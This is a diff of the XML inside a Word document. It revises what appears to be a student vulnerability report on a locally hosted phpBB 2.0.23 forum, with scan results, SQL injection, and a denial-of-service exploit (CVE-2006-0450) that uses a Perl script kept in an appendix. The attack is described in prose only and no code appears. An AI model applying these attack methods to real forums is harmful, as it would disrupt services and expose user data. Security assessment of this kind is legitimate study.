-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1916,35 +2777,6 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A free version of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Acunetrix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:color w:val="auto"/>
-          <w:u w:val="none"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> vulnerabilities scanning tool was downloaded and used to scan the locally hosted PHP forum. This image in figure.1 below illustrates the scan results.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1959,20 +2791,79 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Figure.2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Results of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Acunetrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scan on </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:b/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>http://localhost/phpBB-2.0.23/phpBB2/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:noProof/>
           <w:lang w:eastAsia="en-GB"/>
         </w:rPr>
         <w:drawing>
-          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="314E730C" wp14:editId="29A06303">
             <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:posOffset>0</wp:posOffset>
+            <wp:positionH relativeFrom="margin">
+              <wp:posOffset>299720</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>309245</wp:posOffset>
+              <wp:posOffset>15875</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="5724525" cy="3048000"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+            <wp:extent cx="5008245" cy="2666365"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="635"/>
             <wp:wrapSquare wrapText="bothSides"/>
             <wp:docPr id="2" name="Picture 2" descr="C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\acunetrixScan_localhost.jpg"/>
             <wp:cNvGraphicFramePr>
@@ -1988,7 +2879,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId10" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2003,7 +2894,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5724525" cy="3048000"/>
+                      <a:ext cx="5008245" cy="2666365"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2025,31 +2916,93 @@
           </wp:anchor>
         </w:drawing>
       </w:r>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
-          <w:b/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Figure.1</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
-          <w:b/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Results of </w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">A free version of </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
-          <w:b/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
           <w:lang w:val="en"/>
@@ -2060,37 +3013,84 @@
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
-          <w:b/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> scan on </w:t>
+        <w:t xml:space="preserve"> vulnerabilities scanning tool was downloaded and used to scan the locally hosted PHP forum</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
-          <w:b/>
           <w:color w:val="auto"/>
           <w:u w:val="none"/>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>http://localhost/phpBB-2.0.23/phpBB2/</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve"> [3]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>. The image displayed in figure.2 below illustrates the scan results</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>cunetrix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which provided the foundation information when foot-printing the software vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2101,8 +3101,8 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc446495292"/>
-      <w:bookmarkStart w:id="7" w:name="_Toc446495761"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc446495292"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc448693172"/>
       <w:r>
         <w:rPr>
           <w:color w:val="auto"/>
@@ -2110,8 +3110,8 @@
         </w:rPr>
         <w:t>Entry points</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2135,8 +3135,8 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc446495293"/>
-      <w:bookmarkStart w:id="9" w:name="_Toc446495762"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc446495293"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc448693173"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2145,8 +3145,8 @@
         </w:rPr>
         <w:t>Apache Server</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2213,7 +3213,6 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>The server’s buffer can be exceeded by call</w:t>
       </w:r>
       <w:r>
@@ -2256,7 +3255,37 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> memory outside the scope of original method.</w:t>
+        <w:t xml:space="preserve"> memory outs</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ide of methods allocated memory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The availability of open source PHP libraries allows potential attackers to study source code for exploitations and makes DOS attacks the most popular choice of hack.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> However as this form of attack has been the most popular choice more efforts have been made to close this type of exploit.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2280,8 +3309,8 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc446495294"/>
-      <w:bookmarkStart w:id="11" w:name="_Toc446495763"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc446495294"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc448693174"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2290,88 +3319,180 @@
         </w:rPr>
         <w:t>PHP Functionality</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The majority of 2.0 PHPBB versions house severe security weaknesses. These points of attack have </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>been hardened by later, more reliable</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> versions of PHP. There are many outdated and potentially unsecure versions of PHP still being used in systems today.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Injecting SQL statements</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> [4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> into the server side language can potentially allow the h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>acker to retrieve sensitive data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>. Thi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>s form of attack is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> more difficult than a DOS attack but allows the hacker to target specific functionality of the site opposed to bringing it down.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>SQL (Structured Query Language) injection is a popular method of attack where the attacker seeks to extract, inject, modify or destroy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> data from the systems database by inserting SQL statements</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">into parameters passed into </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>the PHP software</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> This form of attack can provide an effective means of entry to the systems sensitive data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and disrupt or deny system services</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc446495295"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc448693175"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="auto"/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Enumerating Exploits</w:t>
+      </w:r>
       <w:bookmarkEnd w:id="10"/>
       <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>The majority of 2.0 PHPBB versions house severe security weaknesses. These points of attack have been hardened by later and safer versions of PHP. There are many outdated and potentially unsecure versions of PHP still being used in systems today.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Injecting SQL statements into the server side language can potentially allow the h</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>acker to retrieve sensitive data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>. Thi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>s form of attack is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> more difficult than a DOS attack but allows the hacker to target specific functionality of the site opposed to bringing it down.  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc446495295"/>
-      <w:bookmarkStart w:id="13" w:name="_Toc446495764"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="auto"/>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Enumerating Exploits</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="12"/>
-      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2393,8 +3514,8 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc446495296"/>
-      <w:bookmarkStart w:id="15" w:name="_Toc446495765"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc446495296"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc448693176"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2403,8 +3524,8 @@
         </w:rPr>
         <w:t>DOS (Denial of service attack)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2417,7 +3538,31 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Denial of service is the most common form of attack and essentially looks to flood the server with resource intensive requests to deny services to its users.</w:t>
+        <w:t>Denial of service is the most common form of attack and essentially looks to flood the server with resource intensive requests</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> that heavily occupy its CPU</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to deny </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">other </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>services to its users.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2467,6 +3612,14 @@
           <w:lang w:val="en"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2481,19 +3634,23 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This exploit exhausts the user registration functionality of the site and performs malformed search queries that demand network resources. This exploit targets the </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>This exploit exhausts the user registration functionality of the site and performs malformed search queries that demand</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> large amounts of</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> network resources. This exploit targets the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2521,20 +3678,32 @@
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t xml:space="preserve"> files that reside on the apache server. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:t xml:space="preserve"> files that reside on the apache server.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The exploit targets the PHP software operating in Application Layer of the TCP/IP.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
@@ -2544,89 +3713,121 @@
           <w:b/>
           <w:lang w:val="en"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>CVE code:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> CVE-2006-0450 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>[5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
         <w:t xml:space="preserve">Methods of execution: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en"/>
         </w:rPr>
-        <w:t>Refer</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nced in the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>Appendix of this report is a Perl script to perform the method of attack discussed above.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve">DOS (Denial of Service attack), </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>phpBB</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 2.0.19. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>search.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t>profile.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DOS Vulnerability.</w:t>
+        <w:t>Referenced in the Appendix of this report is a Perl script to perform the m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ethod of attack discussed above. This script essentially calls resource intensive functionality such as user registration and malformed search queries</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>. Thi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>s process is iterated a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thousand</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> times to keep</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the system resources engaged by</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> overloading the server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with requests.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The proof of concept exploitation Perl script used in thi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>s example can be found online [6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
